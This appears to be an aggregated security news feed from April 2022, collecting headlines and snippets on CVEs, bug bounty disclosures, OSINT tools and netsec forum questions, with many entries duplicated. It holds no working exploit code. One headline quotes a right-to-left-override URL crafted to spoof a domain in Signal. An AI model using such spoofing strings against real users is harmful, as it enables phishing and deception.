    Anyone here who are former netsec engineers that are now in the field of DevOps? How was the transition? Did you start again from scratch? submitted by /u/heisenboard [link] [comments]
    Anyone ever work for the NSA?
    I've been considering it for the future, because I'm going to school for cybersecurity right now and I have no clue if I want to work for the government, or do something else. What would you recommend? And what is working there like? Seriously thank you so so much if you answer this question because I have been looking everywhere and I haven't been able to find anyone who has worked/works there. :D submitted by /u/AQuestionableAgender [link] [comments]
  • Open

    War in Ukraine / April 14
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Exploring the Dark Web…
    Today I’m going to talk to you about tools for exploring the Dark Web. The list will be updated, as the topic is very diverse. Continue reading on Medium »
    IP address OSINT
    Today I want to discuss with you a number of sources that I use when conducting IP address OSINT research. Continue reading on Medium »
  • Open

    SecWiki News 2022-04-15 Review
    APTMalInsight:基于系统调用信息和本体知识框架识别和认知APT恶意软件 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-15 Review
    APTMalInsight:基于系统调用信息和本体知识框架识别和认知APT恶意软件 by ourren 更多最新文章,请访问SecWiki
  • Open

    Corrupting the Source Docker Image
    submitted by /u/tbhaxor [link] [comments]
    Demystifying iOS Code Signature
    submitted by /u/dmchell [link] [comments]
  • Open

    SSE(Server Sent Event)
    🔍 Introduction SSE(Server-Sent Event)는 Server Push 기술로 웹 소캣과 유사하게 서버와 Javascript가 서로 통신하여 데이터를 받아올 수 있습니다. 다만 웹소켓의 경우 양방향 통신이 가능하지만, SSE는 서버→클라이언트로 받는 요청만 처리할 수 있습니다. 단순히 서버로부터 Push를 받아야하는 경우 SSE가 가장 간편한 기술로 사용될 수 있습니다. 다만 성능이나 기술적인 부분에서 이점보단 단점이 많아서 대부분의 서비스에선 WebSocket 또는 Ajax 방식을 많이 사용합니다. Event Straem Format Basic and content-type SSE는 text/event-stream 타입과 plain text response를 사용합니다.
  • Open

    Gaining Visibility Within Container Clusters
    Service mesh platforms can be used to provide insight into the container processes and their network operations within K8s clusters. The post Gaining Visibility Within Container Clusters appeared first on Unit42.
  • Open

    数字中国车联网赛题设计思路
    本文由 伽玛实验室-mldwyy小姐姐提供,赛后将该题设计思路及解法公开供大家学习交流。
    数字中国车联网赛题设计思路
    本文由 伽玛实验室-mldwyy小姐姐提供,赛后将该题设计思路及解法公开供大家学习交流。
    FreeBuf早报 | 微软破坏了ZLoader僵尸网络;超350万俄罗斯互联网账户被攻破
    俄罗斯黑客试图用 Industroyer2 恶意软件攻击乌克兰的电网。
    思科修复高危身份验证绕过漏洞
    思科无线局域网控制器软件中存在高危漏洞,攻击者能够利用该漏洞绕过身份验证控制。
    ATT&CK v10版本战术介绍—资源开发
    本期我们为大家介绍ATT&amp;CK 14项战术中资源开发战术。
    从电信网络诈骗角度剖析,诈骗资金是如何流转的?
    近年来,随着我国经济社会向数字化快速转型,犯罪结构发生了根本性变化。
    新型Enemybot DDoS僵尸网络借用Mirai和Gafgyt攻击代码
    近日,有研究显示,一个从事加密挖矿攻击和分布式拒绝服务(DDoS)攻击的威胁组织或与一个名为Enemybot的新型僵尸网络或有关。
    CISA警告机构修补积极利用的Windows LPE错误
    网络安全和基础设施安全局(CISA)在其积极利用的漏洞列表中添加了10个新的安全漏洞。
    FreeBuf甲方群话题讨论 | 聊聊企业资产安全管理
    面对现今资产高度数字化、威胁隐患越来越多的网络环境,越发庞大的资产,安全性也显得越发脆弱,维护好企业资产安全面临着较大挑战。
    DVRF靶场复现
    近年来随着各种IOT设备漏洞越来越被大众所关注,漏洞利用所带来的危害也日趋严重。
    谷歌浏览器紧急更新,又修复一零日漏洞
    谷歌发布更新版本Chrome 100.0.4896.127,以解决一个在野被利用高严重性零日漏洞。
    Apache Dubbo CVE-2021-36162 挖掘过程
    Apache Dubbo CVE-2021-36162 挖掘、分析过程。
    想不到,美国核设施太老竟成保命关键?
    直到三年前,美国核系统还在使用一台 1976年生产的 IBM System 1 计算机,有策略认为,因为这些系统太旧了,反而不容易被破解。
    2022年第一季度美国数据泄露持续上升,“未知”成最大攻击媒介
    ITRC记录的绝大多数 (92%) 数据泄露事件可追溯到网络攻击,其中网络钓鱼和勒索软件是总体上排名前两位的原因。
    常见框架漏洞复现—Apache Struts2
    Struts 2漏洞复现分析
    Spring Cloud Gateway 远程代码执行漏洞分析(CVE-2022-22947)
    Spring Cloud Gateway 远程代码执行漏洞分析(CVE-2022-22947分享)

  • Open

    Encontrei meu Primeiro Cross-site Scripting (XSS)
    Olá Hunters! Nesse pequeno Artigo Vou explicar como encontrei meu primeiro (XSS) Continue reading on Medium »
    Bypass Rate Limit — A blank space leads to this random encounter!
    Hello All, Hope you are having a great time! Continue reading on InfoSec Write-ups »
    MY First Bug In Hackerone
    Hello My Dear Buggies!!! Continue reading on Medium »
    Subdomain Enumeration
    Open Source Intelligence gathering tool Continue reading on Medium »
  • Open

    Next step for exploit dev ?
    Good day everyone, So I’ve done a lot of the sources for beginners/intermediate for reversing and exploit dev. I’ve gone through sources users like u/PM_ME_YOUR_SHELLCODE have recommended, also did pwncollege which was really amazing. But now I wanna get into real world stuff and learn as I go. I wanna focus maybe on browser stuff but it’s really overwhelming and hard to find helpful resources. I’m asking to see if anyone here with experience has any pointers on what to start on and where to look( doesn’t necessarily have to be browsers, if anyone has interesting fields to get into I’d be happy to try new things). submitted by /u/Any-Presentation-679 [link] [comments]
    Will learning 6502 processor help me later in binary exploitation and reverse engineering?
    Hello, So basically i am management of information technology graduate. I took basic os and hardware courses in college. Currently i am doing an it internship,and i am practising my hacking skills on hackthebox(web and networks only) . I am very passionate about reverse engineering,assembly,and binary exploitation. I plan that after i am comfortable enough with web applications hacking i can then start doing some exploit development. I am good with solving basic crackmes and simple buffer overflows but that is it. I have a gap in hardware area ,then I discovered someone called Ben Eater on youtube, and I ordered his kit to build a 6502 computer. I am doing this as a hobby first and foremost to know how computers work and interact with cpu and memory. But also so that later in my career i can comfortably understand stack,assembly,and kernel exploits on a deeper level. So is that good or i just wasted my money on the kit? submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Diving Deeper into WatchGuard Pre-Auth RCE - CVE-2022-26318
    submitted by /u/Mempodipper [link] [comments]
    Blinding Snort: Breaking the Modbus OT Preprocessor
    submitted by /u/derp6996 [link] [comments]
    CVE-2022-28345 - Signal client for iOS version 5.33.2 and below are vulnerable to RTLO Injection URI Spoofing using malicious URLs such as gepj.net/selif#/moc.elpmaxe which would appear as example.com/#files/ten.jpeg
    submitted by /u/docker-osx [link] [comments]
    VSTO enabled Office documents allow for remote .NET assembly remote code execution
    submitted by /u/DanielS-AL [link] [comments]
    Akamai Blog | Critical Remote Code Execution Vulnerabilities in Windows RPC Runtime
    submitted by /u/gquere [link] [comments]
    Extracting the hashed uninstall password for Cortex XDR being low privileged user
    submitted by /u/gid0rah [link] [comments]
    Microsoft Exposes Evasive Chinese Tarrask Malware Attacking Windows Computers. The Chinese-backed Hafnium hacking group has been linked to a piece of a new malware that's used to maintain persistence on compromised Windows environments.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Read and write beyond bounds in mod_sed
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1511619 - Bounty: $4000
    [Bypass] Ability to invite a new member in sandbox Organization
    HackerOne disclosed a bug submitted by 0619: https://hackerone.com/reports/1486417 - Bounty: $2500
  • Open

    THE WORLD’S MOST COMPREHENSIVE OSINT TOOL CATALOG MORE THAN 600 TOOLS 2022.
    Waiting for the most expected OSINT service, analyzing more than 600 resources at a time, to be launched (more info here…).  We’re sharing… Continue reading on Medium »
    War in Ukraine / April 13
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Tools(OSINT) every security engineer should be aware off
    We will try to solve three questions in this blog. Let’s explore !! Continue reading on Medium »
    Searchlight — IMINT
    This room has OSINT challenges. In this room, we will be exploring the discipline of IMINT/GEOINT, which is short for Image intelligence… Continue reading on Medium »
    Subdomain Enumeration
    Open Source Intelligence gathering tool Continue reading on Medium »
    Google Dorks or Hack…
    Google Dorks or Hack is a technique for creating queries on the Google search engine to discover hidden information and vulnerabilities… Continue reading on Medium »
    Searching and Aggregating TOR/ONION Links
    While crawling and processing tons of pastes from public paste sites like Pastebin I recognized that people also use these sites to… Continue reading on Medium »
  • Open

    Process Doppelganging (Mitre:T1055.013)
    Introduction Eugene Kogan and Tal Liberman presented a technique for defense evasion called “Process Doppelganging” in Blackhat EU 2017 which can be found here and The post Process Doppelganging (Mitre:T1055.013) appeared first on Hacking Articles.
  • Open

    Process Doppelganging (Mitre:T1055.013)
    Introduction Eugene Kogan and Tal Liberman presented a technique for defense evasion called “Process Doppelganging” in Blackhat EU 2017 which can be found here and The post Process Doppelganging (Mitre:T1055.013) appeared first on Hacking Articles.
  • Open

    Listen to the rumble of dream cars (with videos)
    http://162.212.178.138:8080/cars test http://162.212.178.138:8080/don-games/ Android games http://162.212.178.138:8080/d3/Top10 of something http://162.212.178.138:8080/d4/Videos about China http://162.212.178.138:8080/china/ music videos from China http://162.212.178.138:8080/gsongs/ mp4 pop-rock music submitted by /u/Appropriate-You-6065 [link] [comments]
    Massive SWF archive
    https://locker.phinugamma.org/swf/ It has many SWF files from numerous sites like Armor Games, Addicting Games, Albino Black Sheep, The Best 404 Page Ever, Miniclip, and more. submitted by /u/JeffedCenaa2 [link] [comments]
  • Open

    Dependabot alerts now surface if your code is calling a vulnerability
    Article URL: https://github.blog/2022-04-14-dependabot-alerts-now-surface-if-code-is-calling-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31029253 Points: 2 # Comments: 0
    CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers
    Article URL: https://googleprojectzero.blogspot.com/2022/04/cve-2021-1782-ios-in-wild-vulnerability.html Comments URL: https://news.ycombinator.com/item?id=31029245 Points: 1 # Comments: 0
    Preventing Cryptographic Failures: The No. 2 Vulnerability in the OWASP Top
    Article URL: https://www.synack.com/blog/preventing-cryptographic-failures-the-no-2-vulnerability-in-the-owasp-top-10/ Comments URL: https://news.ycombinator.com/item?id=31027891 Points: 1 # Comments: 0
  • Open

    CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers
    Article URL: https://googleprojectzero.blogspot.com/2022/04/cve-2021-1782-ios-in-wild-vulnerability.html Comments URL: https://news.ycombinator.com/item?id=31029245 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-04-14 Review
    ATT&CK 变成安全“元宇宙”? by ourren TP-Link-WDR-7660 安全研究之固件分析 by ourren 知识图谱可视化技术的实践与探索 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-14 Review
    ATT&CK 变成安全“元宇宙”? by ourren TP-Link-WDR-7660 安全研究之固件分析 by ourren 知识图谱可视化技术的实践与探索 by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf周报 | 恶意软件Mirai正积极利用Springl漏洞;消费者对数据泄露日益麻木
    调查显示。消费者对与他们开展业务的组织的信任处于最低点,导致许多人“放弃”安全性。
    因数据或隐私安全问题,这家巨头近一年已累计被罚超10亿美元
    对互联网企业而言,数据信息既是心头肉,又是心头痛,在利益与维系用户隐私安全面前走钢索,翻车在所难免。
    vulnhub靶机-DerpNStink-1
    7-vulnhub靶机-DerpNStink1
    使用Elasticsearch SIEM搭建小型组织SIEM平台
    Elasticsearch SIEM提供了中小型企业一种自建SIEM的解决方案。优点是开源、组件齐全、文档详细、易扩展等等。
    Shellcode免杀之Go免杀
    Go语言专门针对多处理器系统应用程序的编程进行了优化,使用Go编译的程序可以媲美C或C++代码的速度,而且更加安全、支持并行进程。
    FreeBuf早报 | 非洲银行成恶意软件攻击主要目标;风力涡轮机巨头Nordex遭网络攻击
    德国风力涡轮机制造商 Nordex Group于2022年3月31日遭到网络攻击,该公司本周发布了更新。
    HackTheBox WeatherApp WP 一道 SSRF + SQL 注入的典型案例,代码审计
    这道题目难度中等,如果不提供源码的话是非常难以解决的,虽然可以想到 SSRF,但有点盲人摸象的感觉。
    PortSwigger 基于 WebSocket 的漏洞讲解
    PortSwigger-基于WebSocket的漏洞学习笔记。
    VMware CVE-2022-22954漏洞强势来袭 请立刻打补丁!
    近日,研究人员发现了针对远程代码执行(RCE)漏洞 VMware CVE-2022-22954的概念验证漏洞。
    Elementor WordPress 插件存在漏洞,可能影响 50 万个站点
    WordPress Elementor页面构建插件存在远程代码执行漏洞,可能影响多达 50 万个网站。
    Apache Struts中的CVE-2021-31805 RCE漏洞终于得到修复
    Apache软件基金会敦促机构设法解决编号为CVE-2021-31805的漏洞。
    工信部印发《工业互联网专项工作组2022年工作计划》
    《计划》要求,打造“5G+工业互联网”升级版:加快5G全连接工厂建设,出台5G全连接工厂建设指导性文件,打造10个5G全连接工厂标杆。
    关于Spring framework RCE(CVE-2022-22965)的一些问题思考
    在Spring RCE漏洞在野曝光了一段时间后,Spring官方终于在3月31日发布了漏洞信息,本文分享和解答一些有关这个漏洞的疑问。
  • Open

    Serialization&Deserialization Attacks
    No content preview
    Bypass Rate Limit — A blank space leads to this random encounter!
    No content preview
    BITB (browser in the browser)Attack
    No content preview
    Develop Bluetooth Apps | Fundamentals, Tools & Coding
    No content preview
  • Open

    Serialization&Deserialization Attacks
    No content preview
    Bypass Rate Limit — A blank space leads to this random encounter!
    No content preview
    BITB (browser in the browser)Attack
    No content preview
    Develop Bluetooth Apps | Fundamentals, Tools & Coding
    No content preview
  • Open

    Serialization&Deserialization Attacks
    No content preview
    Bypass Rate Limit — A blank space leads to this random encounter!
    No content preview
    BITB (browser in the browser)Attack
    No content preview
    Develop Bluetooth Apps | Fundamentals, Tools & Coding
    No content preview
  • Open

    BotNet probing private IP ranges?
    Good morning, Have a question for you all that I can't think through the answer. We exist in Azure GCC-H. Looking at my Sentinel threat dashboard, I see a list of "high confidence" botnet activity originating out of Russia, attempting to hit all of my VMs in Azure. Now, they are all private IP addresses, so what I am wondering is how is an external system not in my domain attempting to connect to a 10.X IP address inside my domain without being on a VPN? Is it just pointing its scan at my public gateway and going through the whole list of private IPs, hoping to be able to break through to one? submitted by /u/ToLayer7AndBeyond [link] [comments]
    VPN Host Checker - Asset Validation
    Morning. We’re currently setting up a new VPN environment and we’re thinking about asset validation. There are two options, checking for a machine PKI certificate or simply checking domain membership. Is it enough to simply check domain membership, and can’t that be faked in some way? submitted by /u/annonuk2020 [link] [comments]
    Question about network hardware devices (router,modems,and nic)
    I have a TP-Link router, Old ethernet nic card,and a modem that i want to understand more . Hello; I want to learn some hardware . I am fully aware of the osi model and studied network+ before and understand how nic and routers are used. But can someone explain the components to me on a very low level? Attatched are the hardware i have ,if anyone can point me to a datasheet or something that explains each part(this is a capacitor,this is for volt resistance). Some parts i can identify but others are not. If anyone can help that would be great cuz i want to understand them more . Here is the nic : https://www.amazon.com/Realtek-RTL8139D-100Mbps-Ethernet-Adapter/dp/B000YJIJI2 The modem : https://archiwum.allegro.pl/oferta/modem-lucent-hv90p-t-warszawa-i7535730930.html I kept searching for anything that tells me each component on them but I can’t find any. Thanks submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Persisting XSS With IFrame Traps
    XSS Iframe Traps Longer Running XSS Payloads An issue with cross-site scripting (XSS) attacks is that our injected JavaScript might not run for an extended period of time. It may be a reflected XSS vulnerability where we’ve tricked our user into clicking a link, but when they land on the page where we were able... The post Persisting XSS With IFrame Traps appeared first on TrustedSec.
  • Open

    Make phishing great again. VSTO office files are the new macro nightmare?
    Intro to the Office VSTO format, a capability that provides rich capabilities for attackers to phish users and gain code execution Continue reading on Medium »
  • Open

    The Art of Memory Forensics
    I read somewhere that memory structures change with every iteration of Windows. With that said, does anyone know if The Art of Memory Forensics (2014) is still relevant? Thank you! submitted by /u/DeadBirdRugby [link] [comments]
    Is it possible to split pcap files into pieces?
    I have a big pcap file. I want to split it into chunks with data of the same size each (ex. 1000 packets each). submitted by /u/One-Ad2289 [link] [comments]
    iOS Backup Analysis with Open Source
    Hi community .. currently working on a project on analysing the iPhone backup data with open source tools … I’m working on iOS version 15.3 … I have taken unencrypted backup of passcode disabled … How can we analyse these type of files written in format ‘b5, 56, 20’ etc.. Any suggestions would be helpful… Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Critical RCE Vulnerability in Elementor WordPress Plugin
    Security Risk: High Exploitation Level: Easy CVSS Score: 9.9 Vulnerability: Remote code execution (RCE) Patched Version: 3.6.3 On April 12th, an important security update was released for the Elementor plugin patching a critical remote code vulnerability which allows all authenticated users, including subscribers, to upload and execute arbitrary PHP code on a vulnerable website. This vulnerability, identified as CVE-2022-1329, is extremely severe. Continue reading Critical RCE Vulnerability in Elementor WordPress Plugin at Sucuri Blog.
    Sucuri WordPress Plugin += Sucuri WAF
    Sucuri has always been a dedicated supporter of the WordPress community. Our free plugin was one of our first contributions to WordPress security (before bootstrapping our efforts into our WAF/CDN, Backups, and Malware Remediation services). However, over my many years involved in web application security, I’ve found that one of the most evasive aspects of security for most business owners, enterprises, and agencies is visibility into security events impacting their websites. This includes monitoring who is logging in, knowing what changes are occuring in your site’s environment, and understanding what steps you can take to mitigate risk or react to a compromise.  Continue reading Sucuri WordPress Plugin += Sucuri WAF at Sucuri Blog.
  • Open

    Digging Into Open Reporting
    As many readers of this blog are aware, I often find great value in open reporting, but that I also see the value in taking that open reporting a step (or three) further beyond where it exists now. In more than a few instances, something extra can be pulled from open reporting, something not presented or discussed in the article that can be of significant value to readers in domains such as DFIR, detection engineering, MSS/SOC monitoring, etc. As a result, I've spent a great deal of time during my career looking for alternate means for detecting activity (user, threat actor, malware) presented in open reporting, largely due to gaps in that reporting. For example, there's a great deal of open reporting that is based solely on RE and analysis of malware that is part of the final stage of the…

  • Open

    Reflected XSS on TikTok Website
    TikTok disclosed a bug submitted by homosec: https://hackerone.com/reports/1378413 - Bounty: $3000
    CSRF protection bypass in GitHub Enterprise management console
    GitHub disclosed a bug submitted by bitquark: https://hackerone.com/reports/1497169 - Bounty: $10000
    Stored XSS on the "www.intensedebate.com/extras-widgets" url at "Recent comments by" module with malicious blog url
    Automattic disclosed a bug submitted by superpan: https://hackerone.com/reports/1083734 - Bounty: $150
    Improper Implementation of SDK Allows Universal XSS in Webview Leading to Account Takeover
    EXNESS disclosed a bug submitted by holyfield: https://hackerone.com/reports/1455987 - Bounty: $300
    Ability to connect an external login service for unverified emails/accounts at accounts.shopify.com
    Shopify disclosed a bug submitted by saltymermaid: https://hackerone.com/reports/1018489 - Bounty: $1600
    CRLF Injection - Http Response Splitting
    EXNESS disclosed a bug submitted by socialcodia: https://hackerone.com/reports/1514359 - Bounty: $200
    Acess control vulnerability (read/write)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1174387 - Bounty: $1000
    Access control vulnerability (read/write)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1174734 - Bounty: $2500
    Access control vulnerability (read-only)
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1159367 - Bounty: $2250
    Taking position in a discontinued forex pair without executing any trades
    EXNESS disclosed a bug submitted by a_ashwarya: https://hackerone.com/reports/1509211 - Bounty: $2337
    Open S3 Bucket Accessible by any User
    Omise disclosed a bug submitted by ravansurya: https://hackerone.com/reports/1474017 - Bounty: $100
  • Open

    Other than these, how to best mitigate a DDoS attack?
    Other than CloudFlare, blocking IP blocks on the network firewall and blocking on server's IPtables, what else can be effectively done to mitigate a DDoS attack? submitted by /u/arpegius55555 [link] [comments]
    is my Android screen being monitored?
    Okay here's the thing, I've recently observed that when ever I open my Instagram's vanish mode i see that line " you took screenshot" and it's multiple and comes off like a blast. Where as i haven't taken any screenshots My gallery is clear And I've observed that my device is running slow after the recent softener update it's an realme xt, running Android security patch of date March 5 2022, I usually limit background apps in dev options. I'm not a netsec student or a professional. But someone who is concerned about his privacy. I don't think anyone has any grudges on me. Is it a bug or is it an spyware that i may have accidentally downloaded? Do help me. I may not respond to the comments for the next 6 hrs since I'm crashing to sleep after a whole day of studying. Ik this might be a low effort question. But do apologise. I'm trying my best I've seen my permissions including admin permissions on my phone and all seem normal. submitted by /u/0_lucifer_0 [link] [comments]
    how to know if I'd prefer offensive or defensive security?
    Hello. I am a support engineer, working on my sec+ and hoping to get a cyber security job within a year or two. I can't make up my mind about whether id rather be blue team or red team. CTFs are very fun. Getting a flag or a reverse shell is a rush. But I'm not sure about actual pentesting. Trying to break into a black box system for 100 hours does not sound fun. Blue team sounds fun too. The hunt, trying to figure out how an incident happened and who did it. I also imagine it would be easier to work for startups or big companies later in my career (FAANG). I also like programming beyond scripting. Thoughts? submitted by /u/Throwaway_deafgrape [link] [comments]
    How to find interesting computers on a big network?
    Hello community! When auditing a large Windows network (like 300 computers) how do you figure out which computers may be of interest ? It may be easy if computers are name meaningfully (ADM-something) but if it is not the case how can I figure out (for example) the computer used by a given user (admin, CEO, etc) ? Is it possible to get that information with a powershell AD query? Regards submitted by /u/fAyf5eQR [link] [comments]
    Trusted Remote Desktop Services (RDP) SSL Certificate
    Hi everyone. ​ Our Cyber Security department told us to start deploying and using Certificates to secure comunication between RDP and WMI client and server. My question is related to the valid and renewal period. What should be configured and why? ​ Thanks!! submitted by /u/plainas [link] [comments]
    Securing a password manager with 2FA makes no sense?
    Password managers like LastPass, Bitwarden, 1password, e.g. encourage the use of 2FA to add additional protection by using an authenticator/Yubikey. I strongly disagree, and I don't know why anyone would use 2FA to access their password managers. I travel around the world very much and frequently, also to very hostile countries in Africa and have experienced muggings and armed robberies myself. It's not too uncommon to have all your belongings taken.I would recommend 2FA for individual websites, but for a password manager that contains ALL your passwords, including the ones to back up your 2FA is just nuts. Example: Imagine you are in Ukraine right now.All your passwords are stored in LastPass and you can only access it through your master password and Google Authenticator. The Russians come and take away everything. You have no phone, no computer, nothing. You manage to escape to Poland. You get hold of new devices and try to login LastPass. You can't, because you are missing the 2FA device. Ok, next step. Maybe use the backup codes. Dang, they are stored in LastPass aswell. Ok, next try. Maybe ask Google for help to recover your account. They gave you instructions and tell you to login your Google account or ask to verify your email --> Nope, not possible, because those login details are saved there aswell. You see where this is going? Losing your 2FA device is one of the worst things that could happen. It's and endless loop of not being able to login/reset your devices. Now, even if I have a second phone with the 2FA codes stored in a secure location, that would also be useless if I am traveling on the other side of the world. If anyone has a solution / different approach to this, please enlighten me. submitted by /u/Hallowiegehtseuch [link] [comments]
    How to read pcap file with fields which we only want
    SO I have this pcap file with various protocol involved. ex - udp 12:47:22.002149 IP 226.180.77.184.2836 > 173.91.91.209.20208: UDP, length 147 tcp 12:47:22.000371 IP 149.144.16.81.80 > 173.91.91.2.52260: Flags [.], seq 1400:2800, ack 1, win 2049, options [nop,nop,TS val 869951533 ecr 3357690], length 1400: HTTP let's say I need to do find out what is the minimum and maximum bytes for packets. Now I need to only extract the length field from those packets. For easy analyze I can write this into text format. tcpdump -n -r file.pcap -w file.text If I need to only take length field in UPD I can easily cut it like this cat file.text | grep UDP | cut -f8 -d' ' but this doesn't give valid output in tcp or anyother protocol because the Format is not the same. How to read a pcap file in same format/fields. If I can take all the output in fields, the calculation can be easily done. ex- | Time | scrip | destination ip | packet length Can tcpdump or tshark solve this problem. submitted by /u/lowiqstudent69 [link] [comments]
    Information Security freelance
    My sister is working on a small marketing business who creates video modules for big stores. They hire architects, engineers etc. They had a recent incident wherein an architect used the company’s intellectual property to gain a client for himself. They fired the employee and filed a legal complaint. The small business wants to hire an IT Security consultant. As per the IT Security’s assessment, the company only uses Google Drive for storing they’re data. Any recommendation to prevent IP(Intellectual Property) theft? Do you suggest they subscribe to Google Workspace and configure DLP solution? submitted by /u/girlQueso01 [link] [comments]
  • Open

    Cars and cars interiors
    https://tumakina.com/files/ submitted by /u/shaburushaburu [link] [comments]
    Can I post private apis here?
    I have developed niche hobby of finding private apis of different web apps by grokking in devtools. Its pretty simple but I find it very satisfying. Is there a dedicated subreddit where people post such stuff ? This is the closest one I could find but it is related to open directories not apis. In case there isn't a dedicated subreddit, can I post it here instead for people to discuss? submitted by /u/GullibleEngineer4 [link] [comments]
  • Open

    [Writeup]Hacktoria — Operation Runner
    This is the process my team and I took in solving this CTF! Continue reading on Medium »
    15 best and free computer forensic tools
    In this article, I decided to collect programs that will help you in conducting investigations and will be free at the same time. Continue reading on Medium »
    War in Ukraine / April 12
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Decrypt passwords and improve photo quality
    I wanted to share several tools designed to recover passwords or texts hidden by pixels: Depix (https://github.com/beurtschipper/Depix)… Continue reading on Medium »
    Personal security in Telegram investigations
    Let’s talk about personal security measures when conducting investigations in Telegram. They will be useful to you in other online… Continue reading on Medium »
  • Open

    Social Hunter
    Crawls the given URL and finds broken social media links that can be hijacked. Broken social links may allow an attacker to conduct… Continue reading on Medium »
    [2/3] XSS Through The Front-Door @ GitLab
    Sometimes XSS flaws are met with shrugs. They’re an incredibly common vulnerability in web applications even today with so many… Continue reading on Medium »
  • Open

    Citrix SDWAN Hard-Coded Credentials
    submitted by /u/k1dney [link] [comments]
    TallGrass: An AV exclusion enumeration tool written in Python
    submitted by /u/UnwearableCactus [link] [comments]
    Around 50,000 GitHub credentials leaked as metadata inside commits
    submitted by /u/gid0rah [link] [comments]
    OpenSSH 9 released on 2022-04-08. By default it uses NTRU algorithm which is believed to resist attacks enabled by future quantum computers.
    submitted by /u/mstromich [link] [comments]
    A real PoC for CVE-2022-21907 RCE DoS IIS
    submitted by /u/yoursisterboy [link] [comments]
  • Open

    SecWiki News 2022-04-13 Review
    数据科学研究型人才培养的思考与实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-13 Review
    数据科学研究型人才培养的思考与实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    Coercing NTLM Authentication from SCCM
    submitted by /u/dmchell [link] [comments]
  • Open

    Critical security vulnerability fixed in Elementor (5M+ WordPress Installs)
    Article URL: https://patchstack.com/articles/critical-vulnerability-fixed-in-elementor-plugin/ Comments URL: https://news.ycombinator.com/item?id=31014804 Points: 1 # Comments: 0
    Remote Procedure Call Runtime Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809 Comments URL: https://news.ycombinator.com/item?id=31012416 Points: 4 # Comments: 0
    Microsoft patches zero-day RCE vulnerability with CVE score of 9.8
    Article URL: https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/ Comments URL: https://news.ycombinator.com/item?id=31012226 Points: 1 # Comments: 0
    Git security vulnerability announced
    Article URL: https://github.blog/2022-04-12-git-security-vulnerability-announced/ Comments URL: https://news.ycombinator.com/item?id=31009675 Points: 523 # Comments: 256
  • Open

    Coercing NTLM Authentication from SCCM
    tl;dr: Disable NTLM for Client Push Installation Continue reading on Posts By SpecterOps Team Members »
    Start learn pentesting/hacking. The Red Team
    Useful materials for those who starting to learn pentesting/hacking. All materials checked by myself. Continue reading on Medium »
  • Open

    Heap Exploitation for Homo sapiens.
    No content preview
    Arming the Use-After-Free()
    No content preview
    ROP Chains on ARM
    No content preview
    Integer Overflows in ARM
    No content preview
    Invoking mprotect() using ROP Chains in ARM
    No content preview
    500$ Bug: Sensitive Data Exposure to Broken Access Control leads, How I able to take over any…
    No content preview
    P1 Vulnerability: How I chained Logical-Error to Account-Takeover Vulnerability ‍that No-One…
    No content preview
    How hackers impersonate email-id’s : Email Spoofing and Phishing Attacks
    No content preview
    How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty
    No content preview
    Android Pentesting Setup On Macbook M1
    No content preview
  • Open

    Heap Exploitation for Homo sapiens.
    No content preview
    Arming the Use-After-Free()
    No content preview
    ROP Chains on ARM
    No content preview
    Integer Overflows in ARM
    No content preview
    Invoking mprotect() using ROP Chains in ARM
    No content preview
    500$ Bug: Sensitive Data Exposure to Broken Access Control leads, How I able to take over any…
    No content preview
    P1 Vulnerability: How I chained Logical-Error to Account-Takeover Vulnerability ‍that No-One…
    No content preview
    How hackers impersonate email-id’s : Email Spoofing and Phishing Attacks
    No content preview
    How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty
    No content preview
    Android Pentesting Setup On Macbook M1
    No content preview
  • Open

    Heap Exploitation for Homo sapiens.
    No content preview
    Arming the Use-After-Free()
    No content preview
    ROP Chains on ARM
    No content preview
    Integer Overflows in ARM
    No content preview
    Invoking mprotect() using ROP Chains in ARM
    No content preview
    500$ Bug: Sensitive Data Exposure to Broken Access Control leads, How I able to take over any…
    No content preview
    P1 Vulnerability: How I chained Logical-Error to Account-Takeover Vulnerability ‍that No-One…
    No content preview
    How hackers impersonate email-id’s : Email Spoofing and Phishing Attacks
    No content preview
    How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty
    No content preview
    Android Pentesting Setup On Macbook M1
    No content preview
  • Open

    【安全通报】2022年4月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年4月 安全补丁,修复了针对 53 款微软产品的 119 个漏洞,其中 47 个权限提升漏洞,47 个远程代码执行漏洞,13 个信息泄露漏洞,9 个拒绝服...
  • Open

    【安全通报】2022年4月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年4月 安全补丁,修复了针对 53 款微软产品的 119 个漏洞,其中 47 个权限提升漏洞,47 个远程代码执行漏洞,13 个信息泄露漏洞,9 个拒绝服...
  • Open

    欧盟官员或已被以色列飞马间谍软件盯上
    据路透社最新报道,欧盟高级官员已被臭名昭著的飞马软件(Pegasus)盯上。
    FreeBuf早报 | Hashnode 博客平台存在LFI漏洞;新黑客盗取价值60万美元的加密货币
    在 ESET 和微软研究人员的帮助下,乌克兰官员表示成功阻止了一起针对能源设施的网络攻击。
    LockBit勒索软件团伙潜伏在美政府网络中数月
